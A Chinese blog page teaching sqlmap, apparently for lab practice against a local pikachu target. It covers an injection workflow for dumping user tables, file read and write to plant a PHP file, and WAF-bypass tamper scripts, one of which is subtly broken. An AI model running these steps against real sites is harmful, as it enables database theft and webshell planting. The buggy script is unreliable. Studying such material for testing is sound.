Henry's Blog
  • CobaltStrike系列
    • CobaltStrike的基本操作
    • CobaltStrike会话管理
    • CobaltStrike重定向服务
    • CobaltStrike钓鱼攻击
    • 凭据导出与存储
    • Beacon的常用操作
    • DnsBeacon详解
    • 权限提升
    • 简单的内网信息收集
    • Cross2生成LinuxShell
    • CNA插件开发
    • Profile编写规则
    • BOF开发
    • execute-assembly原理
    • Vps搭建可能遇到的问题
  • OPSEC(免杀)
    • BypassPPL
    • Certutil绕过技巧
    • DLL劫持技术(白+黑)
    • PEB伪装
    • PpidSpoofing
    • Python反序列化免杀
    • WebShell绕过技巧
    • mimikatz免杀
    • 利用CobaltStrikeProfile实现免杀
    • 利用Windows异常机制实现Bypass
    • 削弱WindowsDefender
    • 模拟Powershell实现Bypass
    • 浅谈CobaltStrikeUDRL
    • 添加用户和计划任务(Bypass)
    • 移除NtDll的hook
    • 定位修改MsfShellcode特征码实现免杀
    • 利用COM接口实现进程断链执行.md
    • 免杀工具篇
      • Invoke-Obfuscation
      • Shellter
    • 流量检测逃避
      • CobaltStrike流量逃避.md
      • MSF流量加密.md
      • NC反弹Shell流量加密.md
  • Shellcode加密
    • 前置知识
    • XOR加密
    • AES加密
  • Shellcode加载器
    • 常见的加载方式
    • 分离加载
    • 创建纤程加载
    • 动态调用API加载
    • 基于APC注入加载
    • 基于反调试加载
    • 基于回调函数加载
    • 基于线程池加载
    • 模块踩踏
    • 进程镂空注入(傀儡进程)
    • 反射dll注入(内嵌式)
  • Web渗透
    • 信息收集
    • 各类Webshell
    • 基本漏洞利用
    • 远程命令执行漏洞
    • sql注入
    • sqlmap的使用方法
  • 内网渗透
    • 内网渗透前置知识
    • BadUsb制作
    • Linux反弹Shell总结
    • 内网渗透技术总结
    • 横向移动
      • GoToHttp
      • MS14-068
      • PassTheHash
      • PassTheTicket
      • Psexec
      • RustDesk
      • SMB横移
      • WMI横移
      • 用户枚举与爆破
    • 流量加密
      • CobaltStrike流量加密
      • MsfShell流量加密
      • OpenSSL加密反弹shell
  • 协议分析
    • TCP_IP协议
  • 权限提升
    • 土豆提权原理
    • UAC提权
  • 蓝队技术
    • 应急响应流程总结
  • 进程注入
    • Conhost注入
    • session0注入
    • 内核回调表注入
    • 剪切板注入
  • 逆向技术
    • HOOK技术
    • IDA遇到的坑
    • Shellcode的原理与编写
    • Windbg的使用
    • 使用Stardust框架编写Shellcode
    • PeToShellcode
    • 破解系列
      • PUSH窗体大法
      • VM绕过技巧(易语言)
      • Crackme_1
      • 反破解技术
      • 按钮事件特征码
      • 逆向调试符号
      • 破解实例
        • IDA逆向注册码算法
  • 钓鱼技术
    • Flash网页钓鱼
    • LNK钓鱼
    • 自解压程序加载木马
  • 隧道应用
    • 隧道应用前置知识
    • BurpSuite上游代理
    • DNS隧道传输
    • EarthWorm内网穿透
    • Frp内网穿透
    • ICMP隧道传输
    • MsfPortfwd端口转发
    • Neo-reGeorg内网穿透
    • NetCat工具使用
    • Netsh端口转发
    • SSH端口转发
    • 正向连接与反向连接
  • 基础学习
    • C和C++
      • C++编程
      • C程序设计
    • Linux学习
      • Linux Shell编程
      • linux基础
    • Python基础
      • python之Socket编程
      • python之多线程操作
      • python基础
      • python算法技巧
    • Qt基础
      • Qt笔记
    • 逆向基础
      • PE结构
      • Win32
      • 汇编语言
  • 漏洞复现
    • Web漏洞
      • ApacheShiro反序列化漏洞
    • 系统漏洞
      • Linux漏洞
        • ShellShock(CVE-2014-6271)
  • 靶场系列
    • Web靶场
      • pikachu靶场
      • sqli-labs
      • upload-labs
    • 内网靶场
      • Jarbas靶场
      • SickOS靶场
      • W1R3S靶场
      • prime靶场
      • vulnstack靶场系列一
      • vulnstack靶场系列二
      • vulnstack靶场系列四
  • 代码审计
    • PHP代码审计基础
  • 一些杂七杂八的
    • 开发工具与环境
      • Github的使用
      • JSP环境搭建
      • Pycharm设置代码片段
      • VS2017安装番茄助手(破解版)
      • VisualStudio项目模板的使用
      • WindowsServer搭建IIS环境
      • 安装Scoop
      • c++安装vcpkg
      • dotnet-cnblog的安装与使用
      • gitbook使用教程
      • kali安装burpsuite
      • 配置win2012域服务器
      • VSCode配置MinGW
    • 踩坑记录
      • BurpSuite导入证书
      • Powershell禁止执行脚本
      • centos7没有显示ip
      • kali安装pip2
      • oracle12没有scott用户
由 GitBook 提供支持
在本页
  • sqlmap基础用法
  • 语法参数
  • 注入流程
  • 文件写入和读取
  • Tamper脚本编写
  • 1.了解tamper脚本的结构
  • 2.使用实例
  1. Web渗透

sqlmap的使用方法

sqlmap基础用法

语法参数

参数
描述
实例

-p

注入点

-u www.xxx.com?key=1&name=2 -p key

-u

网站地址

--risk

风险等级(1-3)

--level

扫描等级(1-5)

--dump

对目标信息进行暴力破解

--sql-shell

获取数据库权限

--os-shell

获取系统权限

--proxy

设置代理

--tamper

绕过waf的脚本

--dbms

指定数据库的类型

若已知目标网站的数据库是mysql,那设置--dbms=mysql,即可增加扫描效率

--technique

指定使用哪一种或哪几种SQL注入技术

B:Boolean-based blind E:Error-based U:Union query-based S:Stacked queries T:Time-based blind Q:Inline queries

--batch

提示时自动补全

注入流程

sqlmap -u 目标网址        (检测是否存在sql注入,如果存在并返回目标网址的数据库)

sqlmap -u 目标网址 --is-dba     (检测是否存在dba权限,dba权限是可以把文件写到目录里面去,如果存在就可以把木马写到目录里)

sqlmap -u 目标网址 --dbs  (把目标网址所有的数据库列出来)

sqlmap -u 目标网址 --current-db    (查找当前数据库)

sqlmap -u 目标网址 --tables -D “数据库名”   (查询数据库的所有表名,之后根据经验自己猜一下那个是含有用户信息的表名)

sqlmap -u 目标网址 --columns -T “数据库表名” -D “数据库名”  (查询所有的字段名)

sqlmap -u 目标网址 --dump -D “数据库名” -T “数据库表名” -C “数据库字段名”    (对目标用户信息进行暴力破解)

文件写入和读取

判断是否含有写入权限

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=%E6%9F%A5%E8%AF%A2 --is-dba

读取网站目录下的某个文件,sqlmap会把读取到文件保存到本地的某个目录里

python.exe .\sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?  name=111&submit=%E6%9F%A5%E8%AF%A2" --file-read D:\phpStudy\WWW\nice.php

将本地文件写入服务端

python.exe .\sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=%E6%9F%A5%E8%AF%A2" --file-write C:\1.php --file-dest D:\phpStudy\WWW\1.php

Tamper脚本编写

1.了解tamper脚本的结构

以下是简单的tamper脚本代码,dependencies()函数就是弄个tamper使用说明的,个人认为不必要去了解

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST  #定义脚本的优先级


def dependencies():  #脚本适用范围
    pass


def tamper(payload, **kwargs):  #对payload的修改
    return payload.replace(",", "/")

2.使用实例

例如网站的sql防御机制将"select"过滤掉了,那么我们写的tamper代码就如下

def tamper(payload, **kwargs):  #对payload的修改
    return payload.replace("select", "sselectelect")

将payload的空格都换成==/|%20--%20|/==,代码如下

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST  #定义脚本的优先级

import base64
def dependencies():  #脚本不适用范围
    pass


def tamper(payload, **kwargs):  #对payload的修改
    for i in range(len(payload)):
        if payload[i] == " ":
            payload.replace(" ","/*|%20--%20|*/")

    return payload
上一页sql注入下一页内网渗透

最后更新于7个月前

image-202 10407101508011
image-20210407102630292